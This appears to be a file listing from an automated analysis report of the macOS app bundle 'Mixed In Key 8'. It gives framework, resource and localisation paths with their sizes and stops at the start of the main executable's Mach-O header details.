                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2frame.h18879
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIProgramChangeCommand.h1041
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4file.h4787
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/Info.plist1392
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Headers24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/HeadersD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdatePermissionPrompt.nib18422
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacunknownmetadatablock.h2863
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/PrivateHeaders31
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lproj/Sparkle.strings2424
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEndpoint.h839
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.strings3926
                                                                                                    Mixed In Key 8.app/Contents/Resources/main-theme.png10419
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Resources26
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/urllinkframe.h6277
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/MIK5ToMIK6.cdm10315
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Info.plist1449
                                                                                                    Mixed In Key 8.app/Contents/Resources/TagEditingTableView.nib137032
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asffile.h4573
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/Info.plist1347
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/XPCServices28
                                                                                                    Mixed In Key 8.app/Contents/Resources/no-search-results@2x.png8728
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKEnergyAnalyzer.h745
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.strings2500
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdateAlert.nib15507
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/Sparkle.strings6702
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagID3.h503
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/SegmentEnergySelectorView.nib4245
                                                                                                    Mixed In Key 8.app/Contents/Resources/Ableton_Icon.tiff11080
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUAutomaticUpdateAlert.nib12243
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Modules/module.modulemap655
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdatePermissionPrompt.nib18288
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/About.nib3825
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Resources/songs-empty.tiff28304
                                                                                                    Mixed In Key 8.app/Contents/Resources/top-tab-selected.png2845
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdatePermissionPrompt.nib18577
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.strings4132
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTrackSequenceNameEvent.h1042
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.strings2604
                                                                                                    Mixed In Key 8.app/Contents/Resources/Mashup_transparent.png64028
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/Sparkle.strings7258
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/ProgressView.nib8788
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggflacfile.h5931
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingItem.h3860
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lproj/Sparkle.strings5916
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt.lproj11
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUAutomaticUpdateAlert.nib12122
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.strings4012
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorDatabase.h1699
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacproperties.h4662
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysisSegment.h1820
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/FrameworksD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tiostream.h5384
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tfilestream.h5101
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Resources26
                                                                                                    Mixed In Key 8.app/Contents/Resources/eula/privacy.html888
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.strings4012
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/AD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggpage.h8240
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.strings3858
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxTrack.h1403
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/infotag.h6597
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpegheader.h5055
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorCuePoint.h2284
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/Feedback.nib22210
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavproperties.h5117
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/xmfile.h4153
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftObjectiveC.dylib69936
                                                                                                    Mixed In Key 8.app/Contents/Resources/mik-top-right.tiff108888
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/person-white@2x.png441
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggpageheader.h7624
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Resources26
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/Sparkle.strings7826
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/RadioButtonsView.nib3684
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPitchBendChangeEvent.h1164
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdatePermissionPrompt.nib18611
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/Autoupdate119344
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappableResponder.h6434
                                                                                                    Mixed In Key 8.app/Contents/Resources/mik.icns959062
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDeviceManager.h9319
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdatePermissionPrompt.nib18313
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignature/CodeResources2514
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/ModulesD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-ThinItalic.ttf176300
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/textidentificationframe.h12558
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/Sparkle.strings7582
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOSD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lproj/Sparkle.strings3646
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/row-background.png4309
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacfile.h11974
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/opusfile.h5028
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/Tutorial.nib2596
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings4602
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lproj/Sparkle.strings2424
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfattribute.h5996
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tagunion.h3406
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/AddFilesWindow.nib11128
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftMetal.dylib77792
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdateAlert.nib15858
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdateAlert.nib15771
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_TW.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lproj/Sparkle.strings2424
                                                                                                    Mixed In Key 8.app/Contents/Resources/smart-collection-icon.png954
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdatePermissionPrompt.nib18521
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Headers24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeaders/MIKVolumeAnalysis.h1626
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lproj/Sparkle.strings2424
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftCoreImage.dylib49360
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Resources/Info.plist1339
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/Sparkle.strings8226
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.strings2604
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/_CodeSignature/CodeResources2953
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/News.nib3778
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommand_SubclassMethods.h4096
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/html/top.js1365
                                                                                                    Mixed In Key 8.app/Contents/Resources/analysis-message.tiff85030
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdateAlert.nib15857
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.strings3714
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/SUStatus.nib11630
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpcfile.h8035
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdateAlert.nib15963
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeadersD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Info.plist3293
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Info.plist1234
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/tagutils.h2086
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momdD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/fileref.h10265
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/Sparkle.strings7188
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/analysis-message.tiff85030
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfpicture.h7117
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagErrors.h697
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.strings3568
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.strings3656
                                                                                                    Mixed In Key 8.app/Contents/Resources/PropertyCheckboxesView.nib11307
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-BoldItalic.ttf174952
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/person@2x.png467
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorTrack.h971
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysisCuePoint.h648
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/DanceabilityAudioEngine40
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEndpointSynthesizer.h5281
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUAutomaticUpdateAlert.nib12152
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apefile.h8113
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.strings4340
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/SoftwareView.nib13596
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Headers24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.appD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/stripes-yellow@2x.png1110
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/ResourcesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/MIKAnalysis28
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUAutomaticUpdateAlert.nib12137
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdateAlert.nib15875
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2tag.h16171
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUAutomaticUpdateAlert.nib12192
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Resources26
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/info-white@2x.png869
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/Sparkle.strings6380
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/aiffproperties.h5177
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPolyphonicKeyPressureCommand.h1301
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdateAlert.nib15662
                                                                                                    Mixed In Key 8.app/Contents/Resources/tag@2x.png1311
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagMP4.h338
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.strings4122
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteOffCommand.h3488
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysis.h686
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/relativevolumeframe.h9515
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/ContentsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 3-mashup.mom8716
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpegproperties.h4584
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongCollection.h462
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.strings4132
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.strings6830
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/tag-white@2x.png447
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUAutomaticUpdateAlert.nib12261
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICommandScheduler.h583

                                                                                                    Extracted Files

                                                                                                    Extracted File
                                                                                                    File path:Mixed In Key 8.app/Contents/MacOS/Mixed In Key 8
                                                                                                    File size:1979920
                                                                                                    File type:Mach-O 64-bit executable
                                                                                                    Static Mach Info
                                                                                                    General Information for header 1
                                                                                                    Endian:<
